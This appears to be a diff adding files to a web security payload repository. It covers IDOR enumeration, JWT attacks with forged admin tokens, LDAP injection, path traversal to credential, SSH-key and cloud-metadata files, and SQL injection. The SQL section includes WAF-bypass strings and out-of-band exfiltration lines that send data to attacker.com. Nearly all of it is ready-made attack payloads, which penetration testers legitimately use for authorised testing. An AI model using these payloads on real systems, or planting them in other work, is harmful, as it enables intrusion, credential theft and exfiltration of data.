 # Email-based enumeration
 ?email=user1@example.com
 ?email=user2@example.com
 ?email=admin@example.com
 ?email=test@test.com
 # Phone number enumeration
 ?phone=1234567890
 ?phone=+11234567890
 ?mobile=9876543210
 # Date-based IDs
 ?date=2024-01-01
 ?created_at=2024-01-01
 ?year=2024&month=01&day=01
 # Predictable patterns
 ?ref=INV-001
 ?ref=INV-002
 ?order=ORD-1000
 ?order=ORD-1001
 ?ticket=TKT-001
 # Encoded variations
 ?id=1%00
 ?id=1%0a
 ?id=1%0d
 ?id=1%20
 # Boolean values
 ?admin=true
 ?admin=false
 ?is_admin=1
 ?is_admin=0
 ?superuser=true
 # Wildcard attempts
 ?id=*
 ?user=*
 ?search=*
 # Negative numbers
 ?id=-1
 ?id=-10
 ?id=-100
 ?offset=-1
 # Large numbers
 ?id=999999999
 ?id=2147483647
 ?id=9999999999999
 # Float/Decimal
 ?id=1.0
 ?id=1.5
 ?amount=0.01
 # SQL-style injection in IDOR
 ?id=1' OR '1'='1
 ?id=1 OR 1=1
 ?id=1 UNION SELECT * FROM users
 # NoSQL-style injection in IDOR
 ?id[$ne]=1
 ?id[$gt]=0
 ?user[$regex]=admin
 # XML-style
 ?id=<id>1</id>
 ?user=<user>admin</user>
 # GraphQL IDOR
 ?query={user(id:1){name,email}}
 ?query={user(id:2){name,email}}
 # REST variations
 /users/me
 /users/self
 /users/current
 /users/1
 /users/2
 # Hyphenated IDs
 ?id=user-1
 ?id=account-2
 ?ref=invoice-001
 # Underscore IDs
 ?id=user_1
 ?id=account_2
 ?id=customer_001
@@ -0,0 +1,47 @@
 # JWT (JSON Web Token) Vulnerabilities
 ## Description
 JWT vulnerabilities occur when JSON Web Tokens are improperly implemented or validated, allowing attackers to forge tokens, escalate privileges, or bypass authentication mechanisms. JWTs are widely used for authentication and authorization in modern web applications.
 ## Common Vulnerabilities
 - **None Algorithm** - Setting `alg` to `none` to bypass signature verification
 - **Algorithm Confusion** - Switching from RS256 to HS256
 - **Weak Secret Key** - Using weak or default secrets for HMAC
 - **Key Injection** - Injecting public key in JWK header
 - **Token Expiration** - Missing or improper `exp` validation
 - **SQL Injection in Claims** - Injecting SQL in JWT claims
 - **XSS in Claims** - Storing and reflecting XSS payloads in JWT
 ## JWT Structure
 ```
 header.payload.signature
 ```
 - **Header**: Contains algorithm and token type
 - **Payload**: Contains claims (user data)
 - **Signature**: Cryptographic signature
 ## Common Attack Vectors
 - Authentication endpoints
 - Authorization headers
 - Cookie-based JWT storage
 - URL parameters with JWT
 - Local/Session storage
 ## Impact
 - Authentication bypass
 - Privilege escalation
 - Account takeover
 - Access to unauthorized resources
 - Identity spoofing
 ## Testing Approach
 1. Decode the JWT to examine header and payload
 2. Test with `alg: none` in header
 3. Test algorithm confusion (RS256 → HS256)
 4. Brute force weak secrets
 5. Modify claims (user ID, role, permissions)
 6. Test token expiration validation
 7. Check for sensitive data exposure in payload
 ## Payloads
 See `jwt-vulnerabilities-payloads.txt` for a comprehensive list of JWT attack payloads.
@@ -0,0 +1,259 @@
 # JWT Vulnerabilities Payloads
 # None Algorithm Attack
 # Change alg to "none" and remove signature
 # Original: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature
 # Modified: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
 # Header: {"alg":"none","typ":"JWT"}
 eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
 # Header: {"alg":"None","typ":"JWT"}
 eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
 # Header: {"alg":"NONE","typ":"JWT"}
 eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
 # Header: {"alg":"nOnE","typ":"JWT"}
 eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
 # Algorithm Confusion Attack (RS256 to HS256)
 # Change algorithm from RS256 to HS256 and sign with public key
 # Header: {"alg":"HS256","typ":"JWT"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature_here
 # Weak Secret Brute Force
 # Common weak secrets to test
 secret
 password
 123456
 12345678
 admin
 test
 jwt
 key
 default
 secret123
 password123
 qwerty
 abc123
 letmein
 changeme
 welcome
 monkey
 12345
 iloveyou
 trustno1
 dragon
 # Modified Claims - Privilege Escalation
 # Payload: {"user":"admin"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
 # Payload: {"role":"admin"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4ifQ.
 # Payload: {"admin":true}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6dHJ1ZX0.
 # Payload: {"isAdmin":true}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlfQ.
 # Payload: {"permissions":["admin","read","write","delete"]}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwZXJtaXNzaW9ucyI6WyJhZG1pbiIsInJlYWQiLCJ3cml0ZSIsImRlbGV0ZSJdfQ.
 # User ID Manipulation
 # Payload: {"userId":1}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjF9.
 # Payload: {"sub":"1"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxIn0.
 # Payload: {"id":1}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MX0.
 # Token Expiration Bypass
 # Payload: {"exp":9999999999}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjk5OTk5OTk5OTl9.
 # Payload: No exp field
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
 # Payload: {"exp":null}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOm51bGx9.
 # JWK Header Injection
 # Header: {"alg":"RS256","typ":"JWT","jwk":{"kty":"RSA","kid":"key1","n":"...","e":"AQAB"}}
 eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImp3ayI6eyJrdHkiOiJSU0EiLCJraWQiOiJrZXkxIiwibiI6Ii4uLiIsImUiOiJBUUFCIn19.payload.signature
 # Kid Parameter Injection
 # Header: {"alg":"HS256","typ":"JWT","kid":"../../public.key"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uL3B1YmxpYy5rZXkifQ.payload.signature
 # Header: {"alg":"HS256","typ":"JWT","kid":"/dev/null"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii9kZXYvbnVsbCJ9.payload.signature
 # Header: {"alg":"HS256","typ":"JWT","kid":"../../../dev/null"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uL2Rldi9udWxsIn0.payload.signature
 # SQL Injection in Claims
 # Payload: {"username":"admin' OR '1'='1"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluJyBPUiAnMSc9JzEifQ.
 # Payload: {"user":"admin'--"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4nLS0ifQ.
 # XSS in Claims
 # Payload: {"name":"<script>alert(1)</script>"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PiJ9.
 # Payload: {"comment":"<img src=x onerror=alert(1)>"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjb21tZW50IjoiPGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPiJ9.
 # Empty Signature
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
 # Invalid Signature
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.invalid
 # JKU Header Injection (JWK Set URL)
 # Header: {"alg":"RS256","typ":"JWT","jku":"https://attacker.com/jwks.json"}
 eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImprdSI6Imh0dHBzOi8vYXR0YWNrZXIuY29tL2p3a3MuanNvbiJ9.payload.signature
 # X5U Header Injection (X.509 URL)
 # Header: {"alg":"RS256","typ":"JWT","x5u":"https://attacker.com/cert.pem"}
 eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1dSI6Imh0dHBzOi8vYXR0YWNrZXIuY29tL2NlcnQucGVtIn0.payload.signature
 # X5C Header Injection (X.509 Certificate Chain)
 # Header: {"alg":"RS256","typ":"JWT","x5c":["MIIC..."]}
 eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1YyI6WyJNSUlDLi4uIl19.payload.signature
 # Critical Header Parameter Bypass
 # Header: {"alg":"HS256","typ":"JWT","crit":["exp"],"exp":9999999999}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImNyaXQiOlsiZXhwIl0sImV4cCI6OTk5OTk5OTk5OX0.payload.signature
 # Type Confusion
 # Header: {"alg":"HS256","typ":"JWE"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXRSJ9.payload.signature
 # Null Byte Injection in Kid
 # Header: {"alg":"HS256","typ":"JWT","kid":"key\u0000admin"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleVx1MDAwMGFkbWluIn0.payload.signature
 # Command Injection in Kid
 # Header: {"alg":"HS256","typ":"JWT","kid":"key; whoami"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleTsgd2hvYW1pIn0.payload.signature
 # Path Traversal in Kid
 # Header: {"alg":"HS256","typ":"JWT","kid":"../../../../etc/passwd"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QifQ.payload.signature
 # SQL Injection in Kid
 # Header: {"alg":"HS256","typ":"JWT","kid":"key' OR '1'='1"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleScgT1IgJzEnPScxIn0.payload.signature
 # Audience Manipulation
 # Payload: {"aud":"admin-api"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhZG1pbi1hcGkifQ.
 # Payload: {"aud":["admin","user","guest"]}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOlsiYWRtaW4iLCJ1c2VyIiwiZ3Vlc3QiXX0.
 # Issuer Manipulation
 # Payload: {"iss":"trusted-issuer"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ0cnVzdGVkLWlzc3VlciJ9.
 # Not Before (nbf) Bypass
 # Payload: {"nbf":0}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjB9.
 # JWT ID (jti) Manipulation
 # Payload: {"jti":"admin-token-123"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqdGkiOiJhZG1pbi10b2tlbi0xMjMifQ.
 # Scope Escalation
 # Payload: {"scope":"admin read write delete"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzY29wZSI6ImFkbWluIHJlYWQgd3JpdGUgZGVsZXRlIn0.
 # Custom Claims Injection
 # Payload: {"custom_role":"superadmin"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjdXN0b21fcm9sZSI6InN1cGVyYWRtaW4ifQ.
 # Payload: {"groups":["admin","developers","security"]}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJncm91cHMiOlsiYWRtaW4iLCJkZXZlbG9wZXJzIiwic2VjdXJpdHkiXX0.
 # Numeric Value Manipulation
 # Payload: {"level":999}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZXZlbCI6OTk5fQ.
 # Payload: {"credit":999999}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjcmVkaXQiOjk5OTk5OX0.
 # Boolean Manipulation
 # Payload: {"verified":true}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ2ZXJpZmllZCI6dHJ1ZX0.
 # Payload: {"premium":true}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwcmVtaXVtIjp0cnVlfQ.
 # Array Injection
 # Payload: {"roles":["admin","superuser","root"]}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlcyI6WyJhZG1pbiIsInN1cGVydXNlciIsInJvb3QiXX0.
 # Null Value Injection
 # Payload: {"userId":null}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOm51bGx9.
 # Negative Values
 # Payload: {"userId":-1}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOi0xfQ.
 # Large Numbers
 # Payload: {"userId":2147483647}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNDc0ODM2NDd9.
 # Unicode Injection
 # Payload: {"user":"admin\u0000"}
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW5cdTAwMDAifQ.
 # Base64 URL Encoding Issues
 # Missing padding
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
 # Extra padding
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9==.eyJ1c2VyIjoiYWRtaW4ifQ==.signature==
 # Standard base64 instead of base64url
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9+.eyJ1c2VyIjoiYWRtaW4ifQ/.signature+
 # JWT Confusion with Session Tokens
 # Use JWT where session token expected
 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
 # Empty JWT
 ..
 # Malformed JWT
 malformed.jwt.token
 header.payload
 .payload.signature
 header..signature
 # JWT in URL
 https://target.com/api?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
 # JWT in Cookie
 Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
 # Multiple JWTs
 Authorization: Bearer jwt1, Bearer jwt2
 # JWT with extra segments
 header.payload.signature.extra
 # Case-sensitive Algorithm
 # Header: {"alg":"hs256","typ":"JWT"}
 eyJhbGciOiJoczI1NiIsInR5cCI6IkpXVCJ9.payload.signature
 # Header: {"alg":"Hs256","typ":"JWT"}
 eyJhbGciOiJIczI1NiIsInR5cCI6IkpXVCJ9.payload.signature
@@ -37,3 +37,104 @@ mail=*
 # Attribute extraction
 *)(objectClass=*))(%26(objectClass=*
 *)(uid=*))(%26(uid=*
 # Extended filter injection
 *)(|(objectClass=*))
 *))%00
 %28%29
 %26
 %7C
 *()|%26'
 *()|&'
 *(|(mail=*))
 *(|(objectclass=*))
 # Advanced authentication bypass
 *)(&(objectClass=*))
 *))%00(cn=administrator
 admin*)((|userpassword=*)
 admin*)((|mail=*))
 *)((|(cn=*))
 *)(uid=*))(&(uid=*))
 # Privilege escalation attempts
 *)(userAccountControl:1.2.840.113556.1.4.803:=512)
 *)(adminCount=1)
 *)(memberOf=CN=Domain Admins*)
 *)(memberOf=*)
 # Time-based blind LDAP injection
 *)(cn=admin))(|(cn=*
 *)(cn=a*)(|(cn=*
 *)(cn=ab*)(|(cn=*
 *)(cn=abc*)(|(cn=*
 # Special characters and encoding
 %2a
 %28
 %29
 %26
 %7c
 *%00
 %00*
 *%20
 %20*
 # DN injection
 cn=*,ou=*,dc=*
 cn=admin,ou=*,dc=*
 cn=*,ou=users,dc=*
 # Multi-attribute injection
 (&(uid=admin)(userPassword=*))
 (&(cn=admin)(mail=*))
 (&(objectClass=person)(uid=*))
 (|(&(uid=admin)(userPassword=*))(uid=backup))
 # Error-based injection
 ()
 (&)
 (|)
 (!)
 (&(uid=admin)(!(cn=*)))
 # Filter chain attacks
 *))(|(objectClass=*
 *))(|(mail=*
 *))(|(userPassword=*
 # Attribute enumeration
 (uid=*)
 (cn=*)
 (sn=*)
 (mail=*)
 (telephoneNumber=*)
 (userPassword=*)
 (description=*)
 # Nested filter injection
 (&(uid=admin)(&(cn=*)))
 (|(&(uid=admin)(cn=*))(uid=test))
 (&(objectClass=person)(|(uid=admin)(uid=root)))
 # Comment injection
 *);#
 *);-- 
 *)//
 # Group enumeration
 (memberOf=cn=admins*)
 (memberOf=cn=users*)
 (memberOf=*)
 # Substring search
 (cn=adm*)
 (cn=*admin)
 (cn=*admin*)
 (uid=a*)
 (mail=*@admin.com)
 # Range queries
 (uidNumber>=1000)
 (uidNumber<=5000)
 (createTimestamp>=20200101000000Z)
@@ -55,3 +55,293 @@
 ../../../.env
 ../../../web.config
 ../../../application.properties
 # Advanced encoding techniques
 ..%c0%af
 ..%c1%9c
 ..%e0%80%af
 ..%f0%80%80%af
 ..%c0%2f
 ..%c0%5c
 # Unicode bypass
 ..%u2216
 ..%u2215
 ..%uEFC8
 ..%uF025
 # 16-bit Unicode
 ..%c0%af
 ..%c1%9c
 %c0%ae%c0%ae/
 %c0%ae%c0%ae%c0%af
 # UTF-8 encoding
 %e0%80%ae%e0%80%ae/
 %c0%2e%c0%2e/
 %uff0e%uff0e/
 # Overlong UTF-8
 ..%c0%af
 ..%e0%80%af
 ..%c0%2e%c0%2e%c0%2f
 # Backslash variations
 ..\
 ..\..
 ..\\
 ..\\..\\
 %2e%2e%5c
 %2e%2e%2f
 # Mixed slash/backslash
 ..\/
 ..\/..\
 ../\..\
 ..\/../
 # Absolute path bypass
 /etc/passwd
 /etc/shadow
 /etc/hosts
 /var/log/apache2/access.log
 /var/log/auth.log
 /proc/self/environ
 /proc/self/cmdline
 /proc/self/fd/0
 /proc/self/fd/1
 /proc/self/fd/2
 # Windows absolute paths
 C:\Windows\System32\drivers\etc\hosts
 C:\Windows\System32\config\SAM
 C:\Windows\System32\config\SYSTEM
 C:\boot.ini
 C:\inetpub\wwwroot\web.config
 # Nested traversal
 ....//
 ....\/
 ..../\
 ....\\
 # Dot segment bypass
 ./../
 ./../../
 ././../
 ./.././../
 # Multiple slashes
 ...//
 ....///
 .....////
 # Filter bypass with current directory
 .//.//.//.//..//
 .//.//.//.//.//
 # Stripped traversal (if ../ is filtered)
 ...//...//
 ....\/....\/
 ..;/..;/
 ..;//..;//
 # Null byte variations
 ../../../etc/passwd%00
 ../../../etc/passwd%00.png
 ../../../etc/passwd\x00
 ../../../etc/passwd\0
 # Path normalization bypass
 /var/www/../../etc/passwd
 /./var/./www/./../../etc/passwd
 //var//www//../../etc/passwd
 # URL parameter pollution
 ?file=safe.txt&file=../../../etc/passwd
 ?path=images&path=../../../etc/passwd
 # Common web files
 ../../../index.php
 ../../../index.html
 ../../../wp-config.php
 ../../../configuration.php
 ../../../settings.php
 ../../../config.php
 ../.git/config
 ../.env
 ../.htaccess
 # Framework-specific files
 # Laravel
 ../../../.env
 ../../../storage/logs/laravel.log
 ../../../config/database.php
 ../../../config/app.php
 # Symfony
 ../../../.env.local
 ../../../config/packages/security.yaml
 ../../../var/log/dev.log
 # Django
 ../../../settings.py
 ../../../manage.py
 ../../../db.sqlite3
 # Spring Boot
 ../../../application.properties
 ../../../application.yml
 ../../../application-prod.properties
 # Ruby on Rails
 ../../../config/database.yml
 ../../../config/secrets.yml
 ../../../Gemfile
 # Node.js/Express
 ../../../package.json
 ../../../.env
 ../../../config/default.json
 # ASP.NET
 ../../../web.config
 ../../../Web.config
 ../../../appsettings.json
 ../../../appsettings.Production.json
 # Java
 ../../../WEB-INF/web.xml
 ../../../META-INF/context.xml
 ../../../WEB-INF/classes/application.properties
 # Cloud provider metadata
 ../../../../../../proc/self/environ
 ../../../../../../proc/version
 ../../../../../../proc/cmdline
 # AWS metadata
 http://169.254.169.254/latest/meta-data/
 http://169.254.169.254/latest/user-data/
 http://169.254.169.254/latest/dynamic/instance-identity/document
 # Azure metadata
 http://169.254.169.254/metadata/instance?api-version=2021-02-01
 # GCP metadata
 http://metadata.google.internal/computeMetadata/v1/
 http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
 # Docker
 ../../../../../../proc/self/cgroup
 ../../../../../../proc/self/mountinfo
 ../../../../../../etc/hostname
 # Log files
 ../../../var/log/apache2/access.log
 ../../../var/log/apache2/error.log
 ../../../var/log/nginx/access.log
 ../../../var/log/nginx/error.log
 ../../../var/log/auth.log
 ../../../var/log/syslog
 ../../../var/log/mail.log
 ../../../var/log/mysql/error.log
 # Windows log files
 C:\Windows\System32\winevt\Logs\Application.evtx
 C:\Windows\System32\winevt\Logs\Security.evtx
 C:\Windows\System32\winevt\Logs\System.evtx
 # SSH keys
 ../../../root/.ssh/id_rsa
 ../../../root/.ssh/id_dsa
 ../../../root/.ssh/authorized_keys
 ../../../home/user/.ssh/id_rsa
 ../../../home/user/.ssh/authorized_keys
 # Database files
 ../../../var/lib/mysql/mysql/user.MYD
 ../../../var/lib/postgresql/data/pg_hba.conf
 ../../../var/lib/mongodb/data/db
 # Backup files
 ../../../backup.sql
 ../../../database.sql
 ../../../db_backup.sql
 ../../../site_backup.tar.gz
 ../../../backup.zip
 # Source code files
 ../../../.git/HEAD
 ../../../.git/config
 ../../../.git/logs/HEAD
 ../../../.svn/entries
 ../../../.hg/hgrc
 # Session files
 ../../../tmp/sess_*
 ../../../var/lib/php/sessions/sess_*
 ../../../tmp/sessions/*
 # Cache files
 ../../../tmp/cache/*
 ../../../var/cache/*
 ../../../storage/cache/*
 # Temporary files
 ../../../tmp/*
 ../../../temp/*
 ../../../var/tmp/*
 # SSRF via path traversal
 file:///etc/passwd
 file:///C:/Windows/System32/drivers/etc/hosts
 file://localhost/etc/passwd
 file://127.0.0.1/etc/passwd
 # Path traversal in cookies
 Cookie: file=../../../etc/passwd
 Cookie: path=../../../var/www/html/index.php
 # Path traversal in headers
 X-File: ../../../etc/passwd
 X-Path: ../../../var/www/html/config.php
 User-Agent: ../../../etc/passwd
 Referer: ../../../etc/passwd
 # Path traversal in JSON
 {"file":"../../../etc/passwd"}
 {"path":"../../../var/www/html/config.php"}
 {"template":"../../../etc/passwd"}
 # Path traversal in XML
 <file>../../../etc/passwd</file>
 <path>../../../var/www/html/config.php</path>
 # Polyglot path traversal
 ....//....//....//etc/passwd
 ..%252f..%252f..%252fetc/passwd
 ..%c0%af..%c0%af..%c0%afetc/passwd
 # Filter evasion
 ..%00/..%00/..%00/etc/passwd
 ..%20/..%20/..%20/etc/passwd
 ..%09/..%09/..%09/etc/passwd
 # Case sensitivity (Windows)
 ..\\..\\..\\..\\..\\..\\..\\.\\ETC\\PASSWD
 ..\\..\\..\\..\\..\\..\\..\\.\\Etc\\Passwd
 # Alternate data streams (Windows)
 ../../../test.txt::$DATA
 ../../../test.txt::$INDEX_ALLOCATION
 # UNC paths (Windows)
 \\\\localhost\\C$\\Windows\\System32\\drivers\\etc\\hosts
 \\\\127.0.0.1\\C$\\Windows\\System32\\config\\SAM
 # Mac/Linux specific
 ../../../etc/passwd
 ../../../etc/master.passwd
 ../../../private/etc/master.passwd
 ../../../Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist
@@ -12,6 +12,7 @@ This repository contains a complete collection of testing payloads organized by
 - **[NoSQL Injection](./NoSQL-Injection/)** - NoSQL database injection (MongoDB, Redis, CouchDB)
 - **[XSS (Cross-Site Scripting)](./XSS/)** - Client-side code injection
 - **[Command Injection](./Command-Injection/)** - OS command execution & symbolic link attacks
 - **[SSTI (Server-Side Template Injection)](./SSTI/)** - Template engine exploitation & RCE
 - **[CSV Injection](./CSV-Injection/)** - Formula injection in spreadsheets
 - **[LDAP Injection](./LDAP-Injection/)** - Directory service manipulation
 - **[Log Injection](./Log-Injection/)** - Log file manipulation
@@ -34,6 +35,9 @@ This repository contains a complete collection of testing payloads organized by
 **Configuration & Design:**
 - **[Security Misconfiguration](./Security-Misconfiguration/)** - Default credentials, misconfigurations
 - **[CORS Misconfiguration](./CORS-Misconfiguration/)** - Cross-origin resource sharing issues
 - **[HTTP Request Smuggling](./HTTP-Request-Smuggling/)** - Request desynchronization attacks
 - **[JWT Vulnerabilities](./JWT-Vulnerabilities/)** - JSON Web Token implementation flaws
 - **[Business Logic](./Business-Logic/)** - Business logic flaws
 - **[Weak Cryptography](./Weak-Cryptography/)** - Weak crypto implementations
 - **[Vulnerable Components](./Vulnerable-Components/)** - Known vulnerable libraries
@@ -84,3 +84,197 @@ admin'/*
 {"$where": "sleep(5000)"}
 ' || '1'=='1
 admin' || 'a'=='a
 # Advanced time-based blind SQL injection
 # MySQL advanced
 ' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
 ' AND (SELECT SLEEP(5) FROM information_schema.tables LIMIT 1)--
 ' UNION SELECT IF(1=1,SLEEP(5),0)--
 ' AND IF(1=1,SLEEP(5),0)--
 ' OR IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--
 # PostgreSQL advanced
 '; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
 '; SELECT pg_sleep(5) WHERE 1=1--
 ' AND 1=(SELECT COUNT(*) FROM generate_series(1,1000000))--
 # MSSQL advanced
 '; IF (1=1) WAITFOR DELAY '0:0:5'--
 '; IF (SELECT USER) = 'sa' WAITFOR DELAY '0:0:10'--
 ' AND (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3)>0--
 # Oracle advanced
 ' AND 1=(SELECT COUNT(*) FROM all_users t1,all_users t2,all_users t3)--
 ' AND (SELECT UTL_INADDR.get_host_name('127.0.0.1') FROM dual) IS NOT NULL--
 ' AND (SELECT DBMS_PIPE.RECEIVE_MESSAGE('a',5) FROM dual) IS NULL--
 # WAF/Filter bypass techniques
 # Space bypass
 ' OR '1'='1'--
 'OR'1'='1'--
 'OR'1'='1
 '%09OR%091=1--  # Tab
 '%0AOR%0A1=1--  # New line
 '%0DOR%0D1=1--  # Carriage return
 '/**/OR/**/1=1--
 # Comment bypass
 '/*!OR*/1=1--
 '/*! OR */1=1--
 '/*!50000OR*/1=1--
 '/*!12345OR*/1=1--
 # Case variation bypass
 ' Or '1'='1'--
 ' oR '1'='1'--
 ' OR '1'='1'--
 ' UnIoN SeLeCt--
 # Alternative operators
 ' || '1'='1'--
 ' && 1=1--
 ' | 1=1--
 ' & 1=1--
 # Encoding bypass
 %27%20OR%201=1--
 %27%20%4F%52%20%31%3D%31--
 ' %4F%52 1=1--
 \' OR 1=1--
 %5C%27 OR 1=1--
 # String concatenation bypass
 # MySQL
 '||' (SELECT 'x')='x
 ' OR CONCAT('a','a')='aa'--
 # MSSQL
 ' OR 'a'+'a'='aa'--
 ' OR 'a'||'a'='aa'--
 # Oracle
 ' OR 'a'||'a'='aa'--
 ' OR CONCAT('a','a')='aa'--
 # PostgreSQL
 ' OR 'a'||'a'='aa'--
 # Obfuscation techniques
 ' OR 1=1%00--
 ' OR 1=1%20--
 ' OR 1=1;%00
 ' OR 1=1;%20
 ' OR 1=1/*foo*/--
 ' OR 1=1#%0A
 # Hex encoding
 0x61646D696E  # admin
 0x27206F72202731273D2731  # ' or '1'='1
 # Char function
 CHAR(39) OR CHAR(49)=CHAR(49)  # ' OR '1'='1
 ' OR CHR(49)=CHR(49)--  # Oracle/PostgreSQL
 ' OR ASCII(49)=49--
 # Advanced UNION attacks
 ' UNION SELECT table_name,NULL FROM information_schema.tables--
 ' UNION SELECT column_name,NULL FROM information_schema.columns--
 ' UNION SELECT username,password FROM users--
 ' UNION SELECT @@version,NULL,NULL--
 ' UNION SELECT user(),database(),version()--
 # Out-of-band exploitation
 # DNS exfiltration (MySQL)
 ' AND (SELECT LOAD_FILE(CONCAT('\\\\',(SELECT @@version),'.attacker.com\\a')))--
 # Oracle UTL_HTTP
 ' AND (SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual)--
 # MSSQL xp_dirtree
 '; EXEC master..xp_dirtree '\\attacker.com\a'--
 # Error-based data extraction
 # MySQL
 ' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)y)--
 ' AND EXTRACTVALUE(1,CONCAT(0x5c,(SELECT @@version)))--
 ' AND UPDATEXML(1,CONCAT(0x5c,(SELECT @@version)),1)--
 # MSSQL
 ' AND 1=CONVERT(int,(SELECT @@version))--
 ' AND 1=CAST((SELECT @@version) AS int)--
 # PostgreSQL
 ' AND 1=CAST((SELECT version()) AS numeric)--
 # Oracle
